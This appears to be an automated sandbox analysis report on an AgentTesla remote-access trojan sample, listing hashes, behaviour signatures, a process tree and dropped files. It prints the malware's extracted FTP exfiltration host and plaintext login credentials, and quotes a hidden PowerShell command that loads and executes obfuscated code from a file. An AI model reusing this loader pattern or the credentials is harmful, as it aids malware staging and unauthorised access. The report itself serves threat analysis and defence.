Analysis
-
max time kernel
99s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
09-10-2024 02:10
Static task
static1
Behavioral task
behavioral1
Sample
ac5ace4225e767aa30c1a5d950826c2545887e07027bdba89f653583ca65441d.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
ac5ace4225e767aa30c1a5d950826c2545887e07027bdba89f653583ca65441d.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
Stenklver219.ps1
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
Stenklver219.ps1
Resource
win10v2004-20241007-en
General
-
Target
ac5ace4225e767aa30c1a5d950826c2545887e07027bdba89f653583ca65441d.exe
-
Size
426KB
-
MD5
76c9f492fb7a8f80ec783e727b9cd83d
-
SHA1
d29380e856c2855296bfbdc14de2aef98bf90c3d
-
SHA256
ac5ace4225e767aa30c1a5d950826c2545887e07027bdba89f653583ca65441d
-
SHA512
927cec7b1d2a3414e58ff973aff0525cc79375e118449c9b3f62c0d02d82fe4c2e9d8a6ce446caf17ebc48674b377492be8845abcfaa7e597b3c32750783e393
-
SSDEEP
6144:NqC56ALcmpQFbVySc2pXKJv4Bsn4z6XCWtB/DWfFcCrESnJCd6DRptmr1QHPVTgo:KA9WL5c2pXK+yn4K/uSoESnXl+ZQOE
Malware Config
Extracted
agenttesla
Protocol: ftp- Host:
ftp://ftp.rusticpensiune.ro - Port:
21 - Username:
[email protected] - Password:
99AM}+NZ&CCq!4Vq)9!(zXx01.lQ!~nS.fBnY,4Z~fjHnGo*B3Gd;B{Q1!%-Xw--%vn^0%nt
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2168 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation ac5ace4225e767aa30c1a5d950826c2545887e07027bdba89f653583ca65441d.exe -
Blocklisted process makes network request 2 IoCs
flow pid Process 18 3240 msiexec.exe 20 3240 msiexec.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 3240 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2168 powershell.exe 3240 msiexec.exe -
Drops file in Program Files directory 1 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Common Files\o.pri ac5ace4225e767aa30c1a5d950826c2545887e07027bdba89f653583ca65441d.exe -
Drops file in Windows directory 2 IoCs
description ioc Process File opened for modification C:\Windows\resources\0409\Bitings235\restqfr.sta ac5ace4225e767aa30c1a5d950826c2545887e07027bdba89f653583ca65441d.exe File opened for modification C:\Windows\resources\0409\vampirism\discomposed.ini ac5ace4225e767aa30c1a5d950826c2545887e07027bdba89f653583ca65441d.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 2192 3240 WerFault.exe 89 -
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ac5ace4225e767aa30c1a5d950826c2545887e07027bdba89f653583ca65441d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe -
Suspicious behavior: EnumeratesProcesses 7 IoCs
pid Process 2168 powershell.exe 2168 powershell.exe 2168 powershell.exe 2168 powershell.exe 2168 powershell.exe 2168 powershell.exe 2168 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 2168 powershell.exe -
Suspicious use of AdjustPrivilegeToken 22 IoCs
description pid Process Token: SeDebugPrivilege 2168 powershell.exe Token: SeIncreaseQuotaPrivilege 2168 powershell.exe Token: SeSecurityPrivilege 2168 powershell.exe Token: SeTakeOwnershipPrivilege 2168 powershell.exe Token: SeLoadDriverPrivilege 2168 powershell.exe Token: SeSystemProfilePrivilege 2168 powershell.exe Token: SeSystemtimePrivilege 2168 powershell.exe Token: SeProfSingleProcessPrivilege 2168 powershell.exe Token: SeIncBasePriorityPrivilege 2168 powershell.exe Token: SeCreatePagefilePrivilege 2168 powershell.exe Token: SeBackupPrivilege 2168 powershell.exe Token: SeRestorePrivilege 2168 powershell.exe Token: SeShutdownPrivilege 2168 powershell.exe Token: SeDebugPrivilege 2168 powershell.exe Token: SeSystemEnvironmentPrivilege 2168 powershell.exe Token: SeRemoteShutdownPrivilege 2168 powershell.exe Token: SeUndockPrivilege 2168 powershell.exe Token: SeManageVolumePrivilege 2168 powershell.exe Token: 33 2168 powershell.exe Token: 34 2168 powershell.exe Token: 35 2168 powershell.exe Token: 36 2168 powershell.exe -
Suspicious use of WriteProcessMemory 7 IoCs
description pid Process procid_target PID 3720 wrote to memory of 2168 3720 ac5ace4225e767aa30c1a5d950826c2545887e07027bdba89f653583ca65441d.exe 86 PID 3720 wrote to memory of 2168 3720 ac5ace4225e767aa30c1a5d950826c2545887e07027bdba89f653583ca65441d.exe 86 PID 3720 wrote to memory of 2168 3720 ac5ace4225e767aa30c1a5d950826c2545887e07027bdba89f653583ca65441d.exe 86 PID 2168 wrote to memory of 3240 2168 powershell.exe 89 PID 2168 wrote to memory of 3240 2168 powershell.exe 89 PID 2168 wrote to memory of 3240 2168 powershell.exe 89 PID 2168 wrote to memory of 3240 2168 powershell.exe 89
Processes
-
C:\Users\Admin\AppData\Local\Temp\ac5ace4225e767aa30c1a5d950826c2545887e07027bdba89f653583ca65441d.exe"C:\Users\Admin\AppData\Local\Temp\ac5ace4225e767aa30c1a5d950826c2545887e07027bdba89f653583ca65441d.exe"1⤵
- Checks computer location settings
- Drops file in Program Files directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3720 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden "$Nonprotraction=Get-Content -Raw 'C:\Users\Admin\AppData\Local\Temp\deciliteren\afstnings\Stenklver219.Int';$Helmuth=$Nonprotraction.SubString(747,3);.$Helmuth($Nonprotraction)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2168 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\syswow64\msiexec.exe"3⤵
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:3240 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3240 -s 20164⤵
- Program crash
PID:2192
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3240 -ip 32401⤵PID:1148
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
52KB
MD578082e39dd451e1d5043bcd0d5a72b8e
SHA1ae870a41f8b0585cacd05d5c6651e83460092325
SHA2562f554bddfe10ada0fc5106bced02c8fc45e910848688146287d3423ef094a58f
SHA5128780e10971c1179d341e7f4bfd0089e9586cb05048a75196fbf1a09ec8f48f80ecce8e10b5e5546b311e48bf0c2b2a9e9c481050bfae184f8dfbd7eb5ee984e8
-
Filesize
352KB
MD58024394448ef7b341a0ecd0240d0d957
SHA103c82389ccd69a4973dc5920d35e402b6a52ef19
SHA25665d4c0a99921a9507a334bbb0d4a4c9ca07bdb8bedd7a225c71cfe98ca60cb08
SHA512793a9149d7f1887dd36e46a5f190697369d1bf5e3a66600d08d3941d0dad5db6b56211c16c73fdad9724838c7a6b83bfc5716905af2b4dc5de784cd5b1c883f0